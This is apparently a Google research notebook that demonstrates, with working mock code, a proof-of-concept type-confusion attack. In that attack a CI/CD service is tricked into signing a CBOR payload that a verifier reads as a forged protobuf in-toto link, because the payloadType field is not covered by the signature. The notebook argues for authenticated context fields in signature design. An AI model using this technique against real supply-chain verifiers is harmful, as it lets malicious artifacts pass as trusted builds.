##### Copyright 2020 Google LLC

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

https://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.

## Abstract

This proof-of-concept attack shows the need for any signature scheme to have an authenticated "context" field indicating how to interpret the payload.

_Author: Mark Lodato, Google, <lodato@google.com>_  
_Date: September 2020_

(To edit, [open this doc in Colab](https://colab.research.google.com/github/MarkLodato/ITE/blob/ite-5/ITE/5/hypothetical_signature_attack.ipynb).)

## Overview

In any cryptographic signature wrapper, the payload must be unambiguously interpreted, such that the signer and verifier are guaranteed to interpret the payload identically.

Currently, in-toto and TUF achieved this by requiring that the payload be JSON and that the JSON have a `_type` key that indicates how it is used. Thus, there is only one way for the verifier to interpret the bitstream that the signer signed.

However, there are ongoing discussions about (1) generalizing the signature wrapper so that it is no longer in-toto/TUF-specific, and (2) supporting in-toto payloads other than JSON. If either of these happen, then it will no longer be feasible to require the payload to be JSON. Instead, the signature wrapper **must** include some authenticated "context" indicator that describes how to interpret the payload.

If the signature scheme does *not* include an authenticated context indicator, then an attacker can take a legitimate signed message of type X and get the victim to verify and interpret it as type Y.

What follows is a worked example showing how it can happen in a realistic scenario.






## Scenario

This proof-of-concept assumes the following.

(1) In-toto has been extended to support three different encodings of the link format: JSON, [CBOR](https://en.wikipedia.org/wiki/CBOR), and [Protobuf](https://github.com/grafeas/grafeas/blob/63aff549c1813170558b49e40f41147fd31ad1e3/proto/v1beta1/intoto.proto). In this scenario, the cryptographic wrapper has three fields:

* `payload`: The serialized JSON, CBOR, or Protobuf byte stream.
* `payloadType`: How to interpret `payload`. One of "JSON", "CBOR", or "Protobuf".
* `signatures`: Cryptographic signatures over `payload` but **not** `payloadType`. **This is the problem.**

Note: In this demo, the wrapper is always JSON, both `payload` and `signatures.sig` are encoded in base64, and the signature is over the raw bits prior to base64 encoding. However, this is immaterial to the attack.

(2) There exists a trusted CI/CD service that allows callers to perform arbitrary build requests and returns a signed in-toto link file. This mirrors how system such as GitHub Actions or [Debian rebuilders](https://wiki.debian.org/ReproducibleBuilds) work. In our scenario, the build interface takes three user-defined parameters:

*  `command`: The shell command to run.
*  `encoding`: The `payloadType` to return.

**Problem:** An attacker can trick the CI/CD system to sign arbitrary messages. 

Suppose the following is a **legitimate** link file:

```json
{
  "command": "echo 'hello world'",
  "products": { "stdout": { "sha256": "a948904f2f0f479b8f8197694b30184b0d2ed1c1cd2a1ec0fb85d299a192a447" } },
  "materials": {},
  "_type": "link"
}
```

An attacker can instead get the CI/CD system to **falsely** sign:

```json
{
  "command": "echo 'hello world'",
  "products": { "stdout": { "sha256": "badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb" } },
  "materials": {},
  "_type": "link"
}
```

This can then be used by the attacker to get malicious file with sha256 hash "badbad..." to be accepted by an in-toto verifier.

## Outline of attack

1. Construct a target payload T in protobuf format that we want the victim to consume.
2. Send a carefully crafted build request that results CI/CD returning a signed CBOR-type link file, such that the payload is interpreted as P when type is CBOR but T when type is protobuf.
3. Modify the `payloadType` field to say `Protobuf` instead of `CBOR`. This does not invalidate the signature because the `payloadType` is unauthenticated.
4. Send the modified link file to the victim. They will interpret the payload as T, even though the CI/CD system intended it to be interpreted as P.

## Mock implementations

This demo uses the following mock implementations.

### Dependencies

In [ ]:
!curl -o intoto.proto -sS https://raw.githubusercontent.com/grafeas/grafeas/63aff549c1813170558b49e40f41147fd31ad1e3/proto/v1beta1/intoto.proto
!protoc intoto.proto --python_out=.

In [ ]:
!pip install cbor pycryptodome

### Crypto implementation


In [ ]:
from Crypto.Hash import SHA256
from Crypto.PublicKey import ECC
from Crypto.Signature import DSS

secret_key = ECC.generate(curve='P-256')
public_key = secret_key.public_key()

In [ ]:
def _PubkeySign(message: bytes) -> bytes:
  """Returns the signature of `message`."""
  h = SHA256.new(message)
  return DSS.new(secret_key, 'fips-186-3').sign(h)

def _PubkeyVerify(message: bytes, signature: bytes) -> bool:
  """Returns true if `message` was signed by `signature`."""
  h = SHA256.new(message)
  try:
    DSS.new(public_key, 'fips-186-3').verify(h, signature)
    return True
  except ValueError:
    return False

Tests to make sure it works correctly:

In [ ]:
signature = _PubkeySign(b'good')
assert _PubkeyVerify(b'good', signature)
assert not _PubkeyVerify(b'bad', signature)


### CI/CD implementation

In [ ]:
import base64, cbor, hashlib, json, subprocess, tempfile

def Build(command, encoding):
  """Runs `command` and returns a link file of the given `encoding`.
  
  WARNING: This isn't actually safe to do in a real CI/CD system. We're doing it
  here because it's just a demo where we trust the command.
  """
  with tempfile.TemporaryDirectory() as directory:
    result = subprocess.run(command, shell=True, cwd=directory, check=True,
                            stdout=subprocess.PIPE)
  link = {
      "command": command,
      "materials": {},
      "products": {
          'stdout' : {
              'sha256' : hashlib.sha256(result.stdout).hexdigest()
          }
      },
      "byproducts": {},
      "_type": "link",
  }
  if encoding == 'CBOR':
    payload = cbor.dumps(link)
  else:
    raise NotImplementedError('Encoding "%s" not implemented in this demo' % encoding)
  signature = _PubkeySign(payload)
  wrapper = {
    "payload": base64.b64encode(payload).decode('utf-8'),
    "payloadType": encoding,
    "signatures": [{"sig": base64.b64encode(signature).decode('utf-8')}],
  }
  return json.dumps(wrapper)

Examples showing the wrapper and payload:

In [ ]:
link = Build('echo "hello world"', 'CBOR')
json.loads(link)

{'payload': 'pWdjb21tYW5kcmVjaG8gImhlbGxvIHdvcmxkImltYXRlcmlhbHOgaHByb2R1Y3RzoWZzdGRvdXShZnNoYTI1NnhAYTk0ODkwNGYyZjBmNDc5YjhmODE5NzY5NGIzMDE4NGIwZDJlZDFjMWNkMmExZWMwZmI4NWQyOTlhMTkyYTQ0N2pieXByb2R1Y3RzoGVfdHlwZWRsaW5r',
 'payloadType': 'CBOR',
 'signatures': [{'sig': 'x5Ni6nWD6gaBHZSnN9tZHOGm3smSJY2ZAberyHHGa9WQepXOOb3UdqtJSuxyr7XgtZVZe/pCqk3xqxnhnIE8UQ=='}]}

In [ ]:
cbor.loads(base64.b64decode(json.loads(link)['payload']))

{'_type': 'link',
 'byproducts': {},
 'command': 'echo "hello world"',
 'materials': {},
 'products': {'stdout': {'sha256': 'a948904f2f0f479b8f8197694b30184b0d2ed1c1cd2a1ec0fb85d299a192a447'}}}

In [ ]:
link = Build('echo "something else"', 'CBOR')
cbor.loads(base64.b64decode(json.loads(link)['payload']))

{'_type': 'link',
 'byproducts': {},
 'command': 'echo "something else"',
 'materials': {},
 'products': {'stdout': {'sha256': 'a1621be95040239ee14362c16e20510ddc20f527d772d823b2a1679b33f5cd74'}}}

### Verifier implementation

Instead of writing an actual layout, we simply have the verifier print out the payload. It is sufficient to demonstrate the attack if one signed payload can be interpreted in two different ways.

In [ ]:
import base64, cbor, json, intoto_pb2, pprint

def VerifyAndPrint(link_serialized):
  """Verifies the signature and then prints the payload.

  NOTE: The schema differs slightly between JSON/CBOR and Proto formats.
  This function does not convert between them.
  """
  wrapper = json.loads(link_serialized)
  payload_bytes = base64.b64decode(wrapper['payload'])
  signature = base64.b64decode(wrapper['signatures'][0]['sig'])
  if not _PubkeyVerify(payload_bytes, signature):
    print("Bad signature")
  else:
    print("Good signature")
    link = DECODERS[wrapper['payloadType']](payload_bytes)
    pprint.pprint(link)

DECODERS = {
    'JSON': json.loads,
    'CBOR': cbor.loads,
    'Protobuf': intoto_pb2.Link.FromString,
}

In [ ]:
VerifyAndPrint(Build('echo "hello world"', 'CBOR'))

Good signature
{'_type': 'link',
 'byproducts': {},
 'command': 'echo "hello world"',
 'materials': {},
 'products': {'stdout': {'sha256': 'a948904f2f0f479b8f8197694b30184b0d2ed1c1cd2a1ec0fb85d299a192a447'}}}


In [ ]:
VerifyAndPrint(Build('echo "goodbye world"', 'CBOR'))

Good signature
{'_type': 'link',
 'byproducts': {},
 'command': 'echo "goodbye world"',
 'materials': {},
 'products': {'stdout': {'sha256': '8ef67e7cf7addbb1946c13778f51f8bfa3ee261b1016f6828796dd9fca632fc4'}}}


In [ ]:
orig = Build('echo "hello world"', 'CBOR')
link = json.loads(orig)
link['payload'] = 'x' + link['payload'][1:]
VerifyAndPrint(json.dumps(link))

Bad signature


## Step 1: Construct target payload

First, we construct our target payload in protobuf format. This is what we want the victim to accept.

In [ ]:
%%writefile payload.textproto
effective_command: 'echo "hello world"'
products {
  resource_uri: "stdout"
  hashes {
    sha256: "badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb"
  }
}

Writing payload.textproto


In [ ]:
import intoto_pb2
from google.protobuf import text_format
with open('payload.textproto') as f:
  target_payload = text_format.Parse(f.read(), intoto_pb2.Link()).SerializeToString()
target_payload

b'\n\x12echo "hello world"\x1aL\n\x06stdout\x12B\n@badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'

## Step 2: Construct build request

Next, we need to craft a build command that results in the overall CBOR file being interpreted by the victim as our payload protobuf.

### Proto Parser tool

The following tool will be useful for visualizing protobufs.

In [ ]:
%%writefile proto_parser.py
#!/usr/bin/python3
"""Parses a raw proto wire-format file and shows how each byte is interpeted.

USAGE: ./proto_parser.py <file> [OPTIONS]

Limitations (a.k.a. TODOs):
- Does not parse nested message types.
"""

import io
import math
import shutil
import struct

from typing import IO, Optional


class ProtobufValue:

  def __init__(self, buf: bytes):
    self.buffer = buf

  def format_buffer(self) -> str:
    a = []
    for value in bytearray(self.buffer):
      if value < 0x20 or value == 0x7f:
        # Unicode control code pictures
        # http://www.unicode.org/charts/nameslist/n_2400.html
        char = chr(0x2400 + value)
      elif value == 0x20:
        char = '\u2423'  # open box for space
      elif value >= 0x80:
        char = '\u2426'  # reverse question mark
      else:
        char = chr(value)
      a.append(char)
    return ''.join(a)

  def type_name(self):
    return self.TYPE_NAME


class Varint(ProtobufValue):
  TYPE_NAME = 'varint'

  def __init__(self, buf: bytes, value: int):
    super().__init__(buf)
    self.value = value

  def format_value(self) -> str:
    # TODO: also print signed int, sint (zigzag), hex
    return '%d' % self.value

  @classmethod
  def read(cls, f: IO[bytes], allow_missing=False) -> 'Optional[Varint]':
    buf = bytearray()
    value = 0
    while True:
      if len(buf) > 10:
        raise ValueError('varint exceeded maximum size')
      byte = f.read(1)
      if not byte:
        if allow_missing and not buf:
          return None
        raise ValueError('end of input while reading varint')
      buf.extend(byte)
      b = buf[-1]
      value |= (b & 0x7f) << (7 * (len(buf) - 1))
      if not (b & 0x80):
        break
    return cls(bytes(buf), value)


class FixedBase(ProtobufValue):
  # Subclasses must define: TYPE_NAME, byte_size, struct_int_code

  def format_value(self) -> str:
    # TODO: also print signed int, hex, double
    return str(struct.unpack(self.struct_int_code, self.buffer)[0])

  @classmethod
  def read(cls, f: IO[bytes]) -> 'FixedBase':
    b = f.read(cls.size)
    if len(b) != cls.size:
      raise ValueError('end of input while reading %s' % cls.TYPE_NAME)
    return cls(b)


class Fixed64(FixedBase):
  TYPE_NAME = 'fixed64'
  size = 8
  struct_int_code = 'L'


class Fixed32(FixedBase):
  TYPE_NAME = 'fixed32'
  size = 4
  struct_int_code = 'I'


class LengthDelimited(ProtobufValue):
  TYPE_NAME = 'length-delim'

  def __init__(self, buf: bytes, value: bytes):
    super().__init__(buf)
    self.value = value

  def format_value(self) -> str:
    # TODO: truncate
    if len(self.value) < 23:
      s = self.value.decode('unicode-escape')
    else:
      s = '%s...%s' % (self.value[:20].decode('unicode-escape'),
                       self.value[-20:].decode('unicode-escape'))
    return 'length=%d value=%s' % (len(self.value), s)

  def type_name(self):
    return 'length={}'.format(len(self.value))

  @classmethod
  def read(cls, f: IO[bytes]) -> 'LengthDelimited':
    length = Varint.read(f)
    value = f.read(length.value)
    if len(value) != length.value:
      raise ValueError('expected %d bytes for length-delimited field; got %d' %
                       (length.value, len(value)))
    return cls(length.buffer + value, value)


class StartGroup(ProtobufValue):
  TYPE_NAME = 'start-group'

  def format_value(self) -> str:
    return ''

  @classmethod
  def read(cls, f: IO[bytes]) -> 'StartGroup':
    return cls(b'')


class EndGroup(StartGroup):
  TYPE_NAME = 'end-group'


class Field:

  def __init__(self, tag: Varint, start_pos: int, field_number: int,
               field_value: ProtobufValue):
    self.tag = tag
    self.start_pos = start_pos
    self.field_number = field_number
    self.field_value = field_value

  def type_name(self) -> str:
    return self.field_value.type_name()

  def format_buffer(self) -> str:
    return '{} {}'.format(self.tag.format_buffer(),
                          self.field_value.format_buffer())


class BadField:

  def __init__(self, tag: Varint, start_pos: int, field_number: int,
               error: str):
    self.tag = tag
    self.start_pos = start_pos
    self.field_number = field_number
    self.error = error

  def type_name(self) -> str:
    return 'error'

  def format_buffer(self) -> str:
    return '{} <{}>'.format(self.tag.format_buffer(), self.error)


TYPE_MAP = {
    0: Varint,
    1: Fixed64,
    2: LengthDelimited,
    3: StartGroup,
    4: EndGroup,
    5: Fixed32,
}


def decode(f: IO[bytes]):
  while True:
    start_pos = f.tell()
    try:
      tag = Varint.read(f, allow_missing=True)
    except ValueError as e:
      # TODO: would be nice to keep buffer of error
      tag = Varint(b'', 0)  # dummy value
      yield BadField(tag, start_pos, -1, str(e))
      return
    if tag is None:
      return
    field_number, field_type = tag.value >> 3, tag.value & 7
    try:
      type_class = TYPE_MAP[field_type]
    except KeyError:
      yield BadField(tag, start_pos, field_number,
                     'invalid field type: %s' % field_type)
      return
    try:
      field_value = type_class.read(f)
    except ValueError as e:
      yield BadField(tag, start_pos, field_number, str(e))
      return
    yield Field(tag, start_pos, field_number, field_value)


def decode_and_print(data: bytes,
                     *,
                     width=None,
                     limit=None,
                     header=True) -> None:
  if width is None:
    width = 80
  if header:
    print('{:4} {:4} {:12} {}'.format('Pos.', 'Fld#', 'Type', 'Value'))
  for i, t in enumerate(decode(io.BytesIO(data))):
    line = '{pos:04X} {field_num:4d} {field_type:12} {buffer}'.format(
        pos=t.start_pos,
        field_num=t.field_number,
        field_type=t.type_name(),
        buffer=t.format_buffer(),
    )
    if width > 0 and len(line) > width:
      line = line[:width - 1] + '\u2026'  # ellipsis
    print(line)
    if limit and i + 1 >= limit:
      break


def main():
  import argparse
  description = globals()['__doc__'].split('\n\n', 1)[0]
  p = argparse.ArgumentParser(description=description)
  p.add_argument('file', help='file containing raw wire-format proto')
  p.add_argument(
      '--width',
      '-w',
      type=int,
      default=shutil.get_terminal_size((80, 20)).columns,
      help='width of output in columns; <= 0 means unlimited')
  p.add_argument(
      '--limit',
      '-l',
      type=int,
      help='limit the output to at most this many lines')
  args = p.parse_args()

  with open(args.file, 'rb') as f:
    data = f.read()

  decode_and_print(data, width=args.width, limit=args.limit)


if __name__ == '__main__':
  main()

Writing proto_parser.py


### Constructing the command

First let's inspect the [CBOR](https://en.wikipedia.org/wiki/CBOR) payload with a dummy request. We'll pad it out to roughly the same length as our target payload because we know the length will affect the CBOR encoding.

In [ ]:
import json, base64, binascii
build_command = 'echo ' + 'x' * len(target_payload)
link = Build(build_command, 'CBOR')
payload = base64.b64decode(json.loads(link)['payload'])
print(binascii.hexlify(payload).decode('utf-8'))

a567636f6d6d616e6478676563686f207878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878787878696d6174657269616c73a06870726f6475637473a1667374646f7574a1667368613235367840376638343032636439343539303630626665643632373939636334613735396664353863643237333137313734343036643263393635336134616163643832656a627970726f6475637473a0655f74797065646c696e6b


We can visualize this using <http://cbor.me>:

```
A5                                      # map(5)
   67                                   # text(7)
      636F6D6D616E64                    # "command"
   78 67                                # text(103)
      6563686F20787878...               # "echo xxx..."
...
```

The field that we have control over, `command`, starts at byte offset 11. Let's see how these first several bytes get interpreted as [protobuf](https://developers.google.com/protocol-buffers/docs/encoding) using our tool above:

In [ ]:
import proto_parser
proto_parser.decode_and_print(payload[:19])

Pos. Fld# Type         Value
0000 1652 fixed32      ␦g comm
0006   12 fixed64      a ndxgecho
000F    4 varint       ␣ x
0011   15 varint       x x


That means that the victim will interpret our message as having at least two fields, number 1652 and number 12. The real [intoto.proto](https://github.com/grafeas/grafeas/blob/63aff549c1813170558b49e40f41147fd31ad1e3/proto/v1beta1/intoto.proto) has no such fields, which causes the proto library to simply ignore those fields. Lucky for us!

Furthermore, we get control over the parsed stream starting at the fifth byte of our command. See the first four bytes (`echo`) are part of field 12 (fixed64) and then the fifth byte (space) is interpreted as a varint-type field number 4?

That means we want construct a valid shell command that does nothing but contains our protobuf wire-format payload starting at the fifth byte. We also need to shell-escape our payload so that the command does not fail.

Here is such a command:

```
:  '<payload>'
```

Let's try it:

In [ ]:
assert b"'" not in target_payload
build_command = b":  '" + target_payload + b"'"
link = Build(build_command, 'CBOR')
payload = base64.b64decode(json.loads(link)['payload'])
proto_parser.decode_and_print(payload)

Pos. Fld# Type         Value
0000 1652 fixed32      ␦g comm
0006   12 fixed64      a ndXg:␣␣'
000F    1 length=18    ␊ ␒echo␣"hello␣world"
0023    3 length=76    ␚ L␊␆stdout␒B␊@badbadbadbadbadbadbadbadbadbadbadbadbadba…
0071    4 error        ' <invalid field type: 7>


Almost there! It correctly interprets fields 1 (`effective_command`) and 3 (`products`), but then it chokes on the `'` character ending our shell command.

To fix this, we need to append a tag to our payload to tell the protobuf parser to consume the rest of the input as some dummy field, such as field number 15. The characters `z}` will do precisely that: `z` is field number 15 of type length-delimited, and `~` is length 126, which is the number of remaining bytes.

Let's try it out:

In [ ]:
build_command = b":  '" + target_payload + b"z~'"
link = Build(build_command, 'CBOR')
payload = base64.b64decode(json.loads(link)['payload'])
proto_parser.decode_and_print(payload)

Pos. Fld# Type         Value
0000 1652 fixed32      ␦g comm
0006   12 fixed64      a ndXi:␣␣'
000F    1 length=18    ␊ ␒echo␣"hello␣world"
0023    3 length=76    ␚ L␊␆stdout␒B␊@badbadbadbadbadbadbadbadbadbadbadbadbadba…
0071   15 length=126   z ~'imaterials␦hproducts␦fstdout␦fsha256x@e3b0c44298fc1c…


Yay! We should be good to go. Let's verify by usiing the real proto parser.

In [ ]:
intoto_pb2.Link.FromString(payload)

effective_command: "echo \"hello world\""
products {
  resource_uri: "stdout"
  hashes {
    sha256: "badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb"
  }
}

We're good to go!

## Steps 3 and 4: Pull off the attack

Now that we have constructed our malicious build command, we need to send it to the server and get the victim to consume it.

First, send the malicious build request to the server and get back a signed CBOR message.

In [ ]:
build_command = b":  '" + target_payload + b"z~'"
link_original = Build(build_command, 'CBOR')
json.loads(link_original)  # Print it out for display purposes

{'payload': 'pWdjb21tYW5kWGk6ICAnChJlY2hvICJoZWxsbyB3b3JsZCIaTAoGc3Rkb3V0EkIKQGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJ6fidpbWF0ZXJpYWxzoGhwcm9kdWN0c6Fmc3Rkb3V0oWZzaGEyNTZ4QGUzYjBjNDQyOThmYzFjMTQ5YWZiZjRjODk5NmZiOTI0MjdhZTQxZTQ2NDliOTM0Y2E0OTU5OTFiNzg1MmI4NTVqYnlwcm9kdWN0c6BlX3R5cGVkbGluaw==',
 'payloadType': 'CBOR',
 'signatures': [{'sig': 'LasJ/aXjyKdiVSNrA5uXTiH20D6Am7xa67nBEI9K6ZQYLBitn1NVhMpMEGY6QW7Qnyi6N/LKgZhLsAA5Mvur3Q=='}]}

In [ ]:
VerifyAndPrint(link_original)

Good signature
{'_type': 'link',
 'byproducts': {},
 'command': b':  \'\n\x12echo "hello world"\x1aL\n\x06stdout\x12B\n@badbadbadb'
            b"adbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbz~'",
 'materials': {},
 'products': {'stdout': {'sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'}}}


Next, change the `payloadType` to `Protobuf`.

In [ ]:
link = json.loads(link_original)
link['payloadType'] = 'Protobuf'
link_modified = json.dumps(link)
json.loads(link_modified)  # Print it out for display purposes

{'payload': 'pWdjb21tYW5kWGk6ICAnChJlY2hvICJoZWxsbyB3b3JsZCIaTAoGc3Rkb3V0EkIKQGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJhZGJ6fidpbWF0ZXJpYWxzoGhwcm9kdWN0c6Fmc3Rkb3V0oWZzaGEyNTZ4QGUzYjBjNDQyOThmYzFjMTQ5YWZiZjRjODk5NmZiOTI0MjdhZTQxZTQ2NDliOTM0Y2E0OTU5OTFiNzg1MmI4NTVqYnlwcm9kdWN0c6BlX3R5cGVkbGluaw==',
 'payloadType': 'Protobuf',
 'signatures': [{'sig': 'LasJ/aXjyKdiVSNrA5uXTiH20D6Am7xa67nBEI9K6ZQYLBitn1NVhMpMEGY6QW7Qnyi6N/LKgZhLsAA5Mvur3Q=='}]}

Finally, send it to the victim and profit!

In [ ]:
VerifyAndPrint(link_modified)

Good signature
effective_command: "echo \"hello world\""
products {
  resource_uri: "stdout"
  hashes {
    sha256: "badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb"
  }
}

